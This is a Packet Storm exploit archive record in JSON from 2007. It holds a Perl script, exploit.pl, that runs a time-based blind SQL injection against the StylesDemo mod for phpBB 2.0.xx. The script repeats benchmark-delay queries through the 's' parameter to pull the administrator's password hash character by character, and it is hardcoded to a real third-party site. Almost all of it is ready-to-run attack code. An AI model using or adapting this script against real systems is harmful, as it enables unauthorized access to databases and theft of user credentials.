{"id": "PACKETSTORM:59406", "type": "packetstorm", "bulletinFamily": "exploit", "title": "phpbbstyles-sql.txt", "description": "", "published": "2007-09-19T00:00:00", "modified": "2007-09-19T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/59406/phpbbstyles-sql.txt.html", "reporter": "inj3ct-it.org", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:20:08", "viewCount": 4, "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2016-11-03T10:20:08", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:20:08", "rev": 2}, "vulnersScore": -0.3}, "sourceHref": "https://packetstormsecurity.com/files/download/59406/phpbbstyles-sql.txt", "sourceData": "`#--------------------------------------------------------------- \n# ____ __________ __ ____ __ \n#/_ | ____ |__\\_____ \\ _____/ |_ /_ |/ |_ \n# | |/ \\ | | _(__ <_/ ___\\ __\\ ______ | \\ __\\ \n# | | | \\ | |/ \\ \\___| | /_____/ | || | \n# |___|___| /\\__| /______ /\\___ >__| |___||__| \n# \\/\\______| \\/ \\/ \n#--------------------------------------------------------------- \n# \n#Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org \n# \n#-------------------------------------------------------------- \n# \n#Ktauber.com StylesDemo Mod for phpbb 2.0.xx Multiple Vulnerabilites \n# \n#--------------------------------------------------------------- \n# \n# Coded by nexen \n# \n# GreetZ: Rossi46go for code \n# \n# Description: \n# \n#XSS and SQL Injection \n# \n#--------------------------------------------------------------- \n# \n# \n# \n# \n#--------------------------------------------------------------- \n#exploit.pl \n#--------------------------------------------------------------- \n# \n# \n# \nuse LWP::UserAgent; \nuse HTTP::Request::Common; \nuse Time::HiRes; \n######################################## CONFIGURAZIONE EXPLOIT ########################################################################## \n$sito = \"http://www.forumup.com/stylesdemo/\"; # insert vulnerable site as http://[site]/[path]/ \n########################################################################################################################################## \n$var = \"1\"; \nmy $hash; \n@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); \n \nsub richiesta { \n$var = $_[0]; \n$ua = LWP::UserAgent->new; \n$inizio=Time::HiRes::time(); \n$response = $ua->request(GET $var, \ns => $var); \n$response->is_success() || print(\"$!\\n\"); \n$fine=Time::HiRes::time(); \n$tempo=$fine-$inizio; \nreturn $tempo \n} \n \nsub aggiorna{ \nsystem(\"cls\"); \nprint \"Tempo sql : \" . $_[4] . \" secondi\\n\"; \nprint \"Hash : \" . $_[3] . \"\\n\"; \n} \n \n#print richiesta; \n \nfor ($i=1;$i<33;$i++) \n{ \nfor ($j=0;$j<16;$j++) \n{ \n \n$var=$sito.\"index.php?s=(SELECT IF((ASCII(SUBSTRING(`user_password`,\".$i.\",1))=\".$array[$j].\"),benchmark(200000000,CHAR(0)),0) FROM phpbb_users WHERE `user_id`=2)/*\"; \n$tempo=richiesta($var); \naggiorna($host,$tempodefault,$j,$hash,$tempo,$i); \nif($tempo>9) \n{ \n$tempo=richiesta($var); \naggiorna($host,$tempodefault,$j,$hash,$tempo,$i); \nif($tempo>9) \n{ \n$hash .=chr($array[$j]); \naggiorna($host,$tempodefault,$j,$hash,$tempo,$i); \n$j=200; \n} \n} \n \n} \nif($i==1) \n{ \nif($hash eq \"\") \n{ \n$i=200; \nprint \"Attacco Fallito Sito Fixato\\n\"; \n} \n} \n} \n \n \nprint \"Attacco Terminato\\n\\n\"; \n \nsystem(\"pause\"); \n`\n", "immutableFields": []}

{}